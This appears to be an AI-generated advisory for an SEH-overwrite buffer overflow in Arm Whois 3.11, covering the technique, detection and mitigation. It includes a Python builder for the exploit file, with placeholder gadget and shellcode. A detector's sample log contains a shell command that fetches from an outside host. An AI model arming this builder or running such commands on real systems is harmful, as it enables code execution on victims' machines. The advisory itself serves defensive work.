CVE-2018-25432 Overview
CVE-2018-25432 is a stack-based buffer overflow vulnerability in Arm Whois 3.11, a Windows-based WHOIS lookup utility distributed by Armcode. The flaw allows local attackers to execute arbitrary code by supplying a crafted input file. The malicious input overwrites the Structured Exception Handler (SEH) chain on the stack, redirecting execution to attacker-controlled code. The vulnerability is tracked under [CWE-120] (Buffer Copy without Checking Size of Input) and is documented in Exploit-DB #45907 and the VulnCheck Arm Whois Advisory.
Critical Impact
Local attackers can execute arbitrary code with the privileges of the user running Arm Whois by overwriting the SEH chain. The published exploit sidesteps ASLR rather than defeating it: the POP POP RET gadget is taken from a module loaded without ASLR (and without SafeSEH), so its address is stable across runs.
Affected Products
- Armcode Arm Whois version 3.11
- Distributed via arm-whois.exe from the Armcode website
- Microsoft Windows platforms running the vulnerable binary
Discovery Timeline
- 2026-06-01 - CVE-2018-25432 published to NVD
- 2026-06-02 - Last updated in NVD database
Technical Details for CVE-2018-25432
Vulnerability Analysis
The vulnerability is a classic stack-based buffer overflow that targets the Windows SEH chain. Arm Whois 3.11 reads attacker-controlled data from an input file into a fixed-size stack buffer without bounds checking. When the supplied data exceeds the buffer capacity, adjacent stack memory is overwritten, including the EXCEPTION_REGISTRATION_RECORD that holds the next-SEH (nSEH) pointer and the handler pointer.
When an exception is raised after the overflow, the Windows exception dispatcher calls the corrupted handler address. The dispatcher passes a pointer to the overwritten registration record as the handler's second argument, so a POP POP RET gadget pops the return address and the exception-record pointer and returns into that record, that is, into the attacker-controlled nSEH bytes; a short jump placed there lands in the shellcode. The gadget must come from a module without SafeSEH (otherwise the handler address is rejected before dispatch) and without ASLR (otherwise its address changes per boot). The published proof of concept overwrites the SEH handler pointer at offset 672 of the malicious input file, with nSEH at offset 668.
Root Cause
The root cause is missing input length validation when Arm Whois processes file-based input. The application copies user-supplied content into a stack buffer using an unbounded copy routine, allowing data beyond the buffer boundary to clobber adjacent stack frames. The condition aligns with [CWE-120], where the lack of size verification permits an attacker to overwrite the nSEH and SEH pointer fields that the runtime relies on for structured exception handling.
Attack Vector
Exploitation requires local access and user interaction with a malicious input file. An attacker crafts a file containing 668 bytes of padding, followed by 4 bytes overwriting nSEH with a short forward jump, and 4 bytes overwriting the SEH handler pointer (at offset 672) with the address of a POP POP RET gadget. The remaining bytes hold shellcode. When the victim opens the file in Arm Whois, the oversized copy corrupts the stack and must also raise an exception, which a long enough input typically does by running off the end of the mapped stack; the dispatcher then invokes the corrupted handler, the gadget returns into nSEH, and the short jump pivots execution into the attacker payload. The exploit chain referenced in Exploit-DB #45907 sidesteps ASLR by sourcing the gadget from a module that is neither randomized nor SafeSEH-protected. Two caveats follow: DEP, if enforced for the process, stops the stack-resident shellcode from executing unless the payload first pivots to ROP, and SEHOP defeats the basic form of the technique by validating the handler chain before dispatch.
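The file layout described above, as an added example that is not the Exploit-DB #45907 proof of concept and not Armcode code: a Python script that builds the crafted input and also covers the step that precedes it, locating the overwrite offset with a cyclic pattern. The offsets 668 and 672 are the ones reported for the public PoC; the POP POP RET address is a hypothetical placeholder that must be replaced with a gadget found in a debugger, the INT3 bytes stand in for shellcode, and the output filename is assumed.

```python
import struct

# Offsets reported for the published proof of concept: nSEH is overwritten
# at 668 and the SEH handler pointer at 672 (both 4 bytes, little-endian).
NSEH_OFFSET = 668
SEH_OFFSET = NSEH_OFFSET + 4

# HYPOTHETICAL placeholder, not a gadget from the Exploit-DB entry. The real
# address of a POP POP RET sequence must be located in a module loaded by
# arm-whois.exe that was linked without /SAFESEH and without ASLR support
# (for example with mona.py: !mona seh). It is only here so the layout can
# be inspected and tested offline.
PLACEHOLDER_POP_POP_RET = 0xDEADBEEF

# Short jump forward over the SEH handler pointer: EB 06 jumps 6 bytes past
# the end of the 2-byte instruction, landing at offset 676 where the payload
# starts. The two NOPs fill the remaining bytes of the 4-byte nSEH slot.
NSEH_SHORT_JUMP = b"\xEB\x06\x90\x90"


def cyclic_pattern(length: int) -> bytes:
    """'Aa0Aa1Aa2...' pattern (same scheme as pattern_create.rb); every 4-byte
    window is unique, so a crash value maps back to one offset."""
    out = bytearray()
    for upper in range(ord("A"), ord("Z") + 1):
        for lower in range(ord("a"), ord("z") + 1):
            for digit in range(ord("0"), ord("9") + 1):
                out += bytes([upper, lower, digit])
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def find_offset(pattern: bytes, crash_value: int) -> int:
    """Given the 32-bit value a debugger shows in the overwritten SEH handler
    (or nSEH) slot after feeding `pattern`, return its byte offset in the file."""
    offset = pattern.find(struct.pack("<I", crash_value))
    if offset < 0:
        raise ValueError("crash value not found in pattern")
    return offset


def build_input_file(shellcode: bytes, pop_pop_ret: int = PLACEHOLDER_POP_POP_RET) -> bytes:
    """Lay out the crafted input: padding | nSEH (short jmp) | SEH (gadget) | payload."""
    data = b"A" * NSEH_OFFSET + NSEH_SHORT_JUMP + struct.pack("<I", pop_pop_ret) + shellcode
    # Sanity-check the layout before it is written out.
    assert data[NSEH_OFFSET:SEH_OFFSET] == NSEH_SHORT_JUMP
    assert struct.unpack("<I", data[SEH_OFFSET:SEH_OFFSET + 4])[0] == pop_pop_ret
    return data


def parse_layout(data: bytes) -> dict:
    """Split a candidate input file back into its fields, for inspection or for
    a file-based check of the 672-byte region named in the detection section."""
    return {
        "padding_len": NSEH_OFFSET,
        "nseh": data[NSEH_OFFSET:SEH_OFFSET],
        "seh_handler": struct.unpack("<I", data[SEH_OFFSET:SEH_OFFSET + 4])[0],
        "payload": data[SEH_OFFSET + 4:],
    }


if __name__ == "__main__":
    # Step 1: feed a cyclic pattern, read the value in the SEH chain from the
    # debugger and recover the offset. The crash value is simulated here by
    # reading the pattern at 672 so the script runs offline.
    pattern = cyclic_pattern(1000)
    simulated_seh_value = struct.unpack("<I", pattern[672:676])[0]
    print("SEH handler overwritten at offset", find_offset(pattern, simulated_seh_value))

    # Step 2: build the file. INT3 breakpoints stand in for real shellcode so a
    # debugger stops as soon as control reaches the payload.
    poc = build_input_file(b"\xCC" * 32)
    with open("arm-whois-poc.txt", "wb") as f:  # assumed output name
        f.write(poc)
    print("wrote", len(poc), "bytes")
```

Feed the 1000-byte cyclic pattern to the application first; the value the debugger shows in the handler slot of the corrupted chain, passed to find_offset, should come back as 672, which confirms the layout before the real file is written with a gadget substituted for the placeholder.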
Detection Methods for CVE-2018-25432
Indicators of Compromise
- Presence of arm-whois.exe version 3.11 on managed endpoints (an exposure indicator rather than evidence of compromise)
- Crash dumps or Windows Error Reporting events referencing arm-whois.exe with access violations in exception handling
- Input files exceeding typical WHOIS query length, particularly with content around the 672-byte offset
- Unexpected child processes spawned by arm-whois.exe, such as cmd.exe or powershell.exe
Detection Strategies
- Inventory endpoints for the vulnerable binary using software asset management or EDR file telemetry
- Monitor process creation events where arm-whois.exe is the parent of shell or scripting interpreters
- Hunt for unusual image loads into arm-whois.exe (Sysmon Event ID 7) and for access-violation crashes in the process that are followed by new process or network activity from it
- Alert on creation of unusually large input files in directories that Arm Whois reads; Sysmon's FileCreate event does not record size, so pair it with EDR file telemetry or on-access scanning that does
Monitoring Recommendations
- Enable process-creation logging with command line and parent process via Sysmon Event ID 1, and file-creation logging via Sysmon Event ID 11, on Windows hosts; Event ID 7 (image load) adds the module list needed to review which DLLs arm-whois.exe pulls in
- Correlate exception-handling crashes with subsequent process injection or network activity
- Track execution of arm-whois.exe across the environment and flag installs that bypass approved software channels
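The lineage and execution-tracking strategies above (shell or script interpreter spawned by arm-whois.exe, and any run of the binary at all), as an added example that is not part of the original advisory: a Python detector that parses Sysmon Event ID 1 records exported as XML and returns findings. The event batch, host name, timestamps, paths and the 203.0.113.10 address are constructed for the example; the interpreter list is an assumption to tune per environment.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Namespace of Windows event log XML, which Sysmon events use.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

VULNERABLE_IMAGE = "arm-whois.exe"
# Assumed list: interpreters and LOLBins a WHOIS lookup tool has no reason to spawn.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "certutil.exe"}

# CONSTRUCTED sample: Sysmon events in the shape produced by
# Get-WinEvent | ForEach-Object { $_.ToXml() }, wrapped in a made-up <Events>
# root so one parse call handles the batch. Host, times and paths are invented.
SAMPLE_EVENTS = """<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<Event><System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01</Computer></System>
<EventData><Data Name="UtcTime">2024-01-10 09:14:02.110</Data>
<Data Name="Image">C:\\Program Files\\Armcode\\arm-whois.exe</Data>
<Data Name="CommandLine">"C:\\Program Files\\Armcode\\arm-whois.exe" C:\\Users\\alice\\Downloads\\targets.txt</Data>
<Data Name="ParentImage">C:\\Windows\\explorer.exe</Data></EventData></Event>
<Event><System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01</Computer></System>
<EventData><Data Name="UtcTime">2024-01-10 09:14:03.442</Data>
<Data Name="Image">C:\\Windows\\System32\\cmd.exe</Data>
<Data Name="CommandLine">cmd.exe /c whoami &amp;&amp; curl http://203.0.113.10/s</Data>
<Data Name="ParentImage">C:\\Program Files\\Armcode\\arm-whois.exe</Data></EventData></Event>
<Event><System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>11</EventID><Computer>WS01</Computer></System>
<EventData><Data Name="UtcTime">2024-01-10 09:14:00.900</Data>
<Data Name="Image">C:\\Windows\\explorer.exe</Data>
<Data Name="TargetFilename">C:\\Users\\alice\\Downloads\\targets.txt</Data></EventData></Event>
<Event><System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01</Computer></System>
<EventData><Data Name="UtcTime">2024-01-10 09:20:15.001</Data>
<Data Name="Image">C:\\Windows\\System32\\notepad.exe</Data>
<Data Name="CommandLine">notepad.exe</Data>
<Data Name="ParentImage">C:\\Windows\\explorer.exe</Data></EventData></Event>
</Events>"""


@dataclass
class Finding:
    rule: str
    utc_time: str
    image: str
    parent_image: str
    command_line: str


def _event_data(event: ET.Element) -> dict:
    """Flatten <EventData><Data Name="...">value</Data> into a dict."""
    return {d.get("Name"): (d.text or "") for d in event.findall("e:EventData/e:Data", NS)}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_sysmon_events(xml_blob: str) -> List[Finding]:
    """Apply two lineage rules to a batch of Sysmon events: flag every execution
    of the vulnerable binary, and every shell or script interpreter whose parent
    is arm-whois.exe. Only Event ID 1 carries ParentImage, so other event types
    (such as the ID 11 FileCreate record in the sample) are skipped here."""
    findings: List[Finding] = []
    for event in ET.fromstring(xml_blob).findall("e:Event", NS):
        if event.findtext("e:System/e:EventID", default="", namespaces=NS) != "1":
            continue
        d = _event_data(event)
        image, parent = _basename(d.get("Image", "")), _basename(d.get("ParentImage", ""))
        common = (d.get("UtcTime", ""), d.get("Image", ""), d.get("ParentImage", ""), d.get("CommandLine", ""))
        if image == VULNERABLE_IMAGE:
            findings.append(Finding("vulnerable-binary-executed", *common))
        if parent == VULNERABLE_IMAGE and image in SUSPICIOUS_CHILDREN:
            findings.append(Finding("suspicious-child-of-arm-whois", *common))
    return findings


if __name__ == "__main__":
    for f in analyze_sysmon_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.utc_time} {f.parent_image} -> {f.image} :: {f.command_line}")
```

On the constructed batch the first rule fires once (the launch of arm-whois.exe with a file argument) and the second once (cmd.exe reaching out to an external host); the benign notepad.exe launch and the FileCreate record produce nothing. The first rule is noisy wherever the tool is legitimately used and is meant for asset tracking; the second is the one worth paging on.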
How to Mitigate CVE-2018-25432
Immediate Actions Required
- Remove or block execution of Arm Whois 3.11 (arm-whois.exe) on all managed endpoints
- Restrict opening of untrusted input files with the affected utility
- Apply application allow-listing to prevent unauthorized execution of the vulnerable binary
- Replace Arm Whois with a maintained WHOIS client that enforces input validation
Patch Information
No vendor patch is referenced in the available advisories. The Armcode company website hosts the affected arm-whois.exe download, but no fixed version has been published. Organizations should treat the product as unmaintained and remove it from production systems. Consult the VulnCheck Arm Whois Advisory for ongoing status.
Workarounds
- Uninstall Arm Whois 3.11 and use vendor-supported alternatives for WHOIS lookups
- Enforce Data Execution Prevention (DEP) and SEHOP system-wide to raise exploitation cost; SafeSEH is a link-time property of each module (/SAFESEH) and cannot be switched on for an existing binary, which is exactly why the gadget module's lack of it matters
- Apply Exploit Protection (Windows Defender Exploit Guard) or an equivalent per-process mitigation to the legacy binary, for example Set-ProcessMitigation -Name arm-whois.exe -Enable DEP,SEHOP
- Run the utility only in isolated, non-privileged environments if its use cannot be eliminated
# Configuration example: block execution of arm-whois.exe via Windows AppLocker (PowerShell).
# New-AppLockerPolicy has no -Action/-Path parameters and emits Allow rules only, so the Deny rule is
# written as AppLocker policy XML and merged with Set-AppLockerPolicy (AppIDSvc must be running). Merge
# only into a policy that already carries the default Allow rules: an enforced Exe collection holding
# nothing but a Deny rule blocks every executable. Path rules are dodged by copying the binary; prefer a hash rule.
$xml = '<AppLockerPolicy Version="1"><RuleCollection Type="Exe" EnforcementMode="Enabled">' +
  '<FilePathRule Id="' + [guid]::NewGuid() + '" Name="Block-CVE-2018-25432" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">' +
  '<Conditions><FilePathCondition Path="%PROGRAMFILES%\Armcode\arm-whois.exe" /></Conditions></FilePathRule></RuleCollection></AppLockerPolicy>'
Set-Content -Path "$env:TEMP\Block-CVE-2018-25432.xml" -Value $xml
Set-AppLockerPolicy -XmlPolicy "$env:TEMP\Block-CVE-2018-25432.xml" -Merge
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


